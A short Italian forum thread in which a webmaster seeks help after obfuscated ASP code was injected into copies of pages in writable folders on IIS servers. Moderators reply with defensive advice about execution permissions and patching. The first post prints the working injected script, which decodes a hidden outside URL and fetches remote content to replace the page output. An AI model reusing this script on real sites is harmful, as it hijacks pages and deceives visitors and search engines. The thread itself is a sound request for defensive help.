Visualizzazione dei risultati da 1 a 4 su 4
  1. #1

    Hackeraggio dei miei server windows tramite asp

    Ciao a tutti ho una grossa problematica di attacco hacker a vari siti web che gestisco in vari server che hanno svariate combinazioni.
    Tutti i server che ho utilizzando le versioni windows 2000 - 2003 o addirittura 2012 server e iis dalla versione 6 alla versione 7.5 e sono tutti configurati per utilizzare il linguaggio asp.
    In pratica sui siti dove ho delle cartelle con i diritti di scrittura perchè magari quel sito ha un'area riservata dove l'utente carica sul suo sito foto o pdf mi ritrovo dentro delle pagine .asp che sono l'esatta copia di altre pagine che ho sul server (ma esatta copia del codice compreso l'asp) con incollato o subito sotto al tag body o subito prima della chiusura del body questo codice:

    codice:
    On Error Resume Next
    Function brr(c, f)
        dim crr,n,u
        crr=Split(c, "-")
        For n=0 To UBound(crr)
            If crr(n)<>"" Then u=u&Chr(crr(n))
        Next
        If InStr(u, f)=0 Or f="" Then Exit Function
        u=Replace(u, f, "")
        brr=u
    End Function
    dim fso
    Set fso=Server.CreateObject("CDO.Message")
    Dim arr(7)
    arr(0)=Request.Querystring()
    If arr(0)<>"" Then
       arr(1)=Instr(arr(0),brr("42-42-42-42-63-42-42-","*"))
       arr(2)=Instr(arr(0),brr("37-37-37-37-61-37-37-","%"))
       arr(3)=Mid(arr(0),arr(1)+1,arr(2)-arr(1)-1)
       arr(4)=brr("46-104-42-42-116-42-42-109-42-42-108-","*")
       arr(5)=Request.Querystring(arr(3))
       If Instr(arr(5),arr(4))>0 Then arr(4)=""
       arr(6)=brr("94-94-94-94-47-94-94-","^")
       arr(7)=brr("104-116-116-112-58-47-47-119-119-119-46-100-114-100-114-38-101-98-101-97-116-115-46-101-117-47-104-101-105-121-101-47-38-102-105-99-38-101-46-105-116-47-","&")
       fso.CreateMHTMLBody arr(7)&arr(3)&arr(6)&arr(5)&arr(4),31
       Select Case fso.HTMLBody
              Case ""
              Case fso.HTMLBody
                   Response.Clear
                   Response.Write fso.HTMLBody    
                   Response.End                   
       End Select
       Set fso=Nothing  
    End If
    questo codice asp ovviamente non creato da me e che mi ritrovo incollato dentro queste pagine non fa altro che creare un suo contenuto html che viene "appiccicato" sopra alla pagina originale, così se viene chiamata questa pagina da google il risultato sarà un contenuto completamente diverso rispetto all'originale.
    Mi sono accorto della cosa proprio perchè il webmaster tools di google mi ha segnalato la cosa.

    Ho controllato nei log e non c'è assolutamente nulla, l'accesso ftp non è stato violato; non so come questo hacker riesce ad accedere alle cartelle con i permessi di scrittura, si riesce a copiare una pagina del sito e ci incolla sopra questo codice.
    Ho provato a cercare su internet e per quanto sono riuscito a capire sembra un attacco alla webshell solo che non riesco a capire come difendermi.
    Una vulnerabilità di windows o dell'iis mi sembra strano visto che mi capita con svariati sistemi opertaivi e con svariate versioni di iss.
    Non posso chiudere tutte le cartelle con i permessi di scrittura altrimenti le aree riservate dei miei clienti si vanno a far benedire e per esempio Aruba ha addiruttura 2 cartelle con i permessi di scrittura sui suoi server (mdb-database e public) e la problematica non accade mai stessa cosa su register.
    Unica cosa che accomuna tutti i siti è l'utilizzo dello scripr di lorenzo abbati upload.asp versione 3.1.1 ma non ho trovato nessuna vulnerabilità di questo script che uso da anni.
    Qualcuno sai aiutarmi? darmi qualche dritta su dove andare a guardare per risolvere questo problema?
    Ahimè google mi segnala giustamente che i siti sono compromessi e il posizionamento crolla.
    Grazie a tutti per l'aiuto

  2. #2
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    come misura tampone nell'immediato rimuoverei il diritto di esecuzione script nelle cartelle che hanno diritti di scrittura..
    In tal modo, qualunque fossa la modalità di upload, il file non potrebbe comunque essere eseguito...
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  3. #3
    E' infatti quello che ho fatto come misura tampone, adesso riescono lo stesso a scrivere dentro la cartella ma almeno il file non viene eseguito .... ahimè mi girano lo stesso perché non vorrei proprio che ci scrivessero, anzi vorrei sinceramente capire come fanno e da dove passano con sicurezza

  4. #4
    Utente di HTML.it
    Registrato dal
    Mar 2014
    residenza
    Crema
    Messaggi
    205
    Ciao,
    in in effetti così hai arginato il problema ma non l'hai risolto.Proverei a verificare se hai installato tutte le PATCH e FIX vari e disabilitando tutto ciò che non serve. Se non ti è entrato nessuno, è possibile che possa essere un virus o un trojan, che su IIS festeggia a nozze ogni sua attività malevola .

    Bye
    Max

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.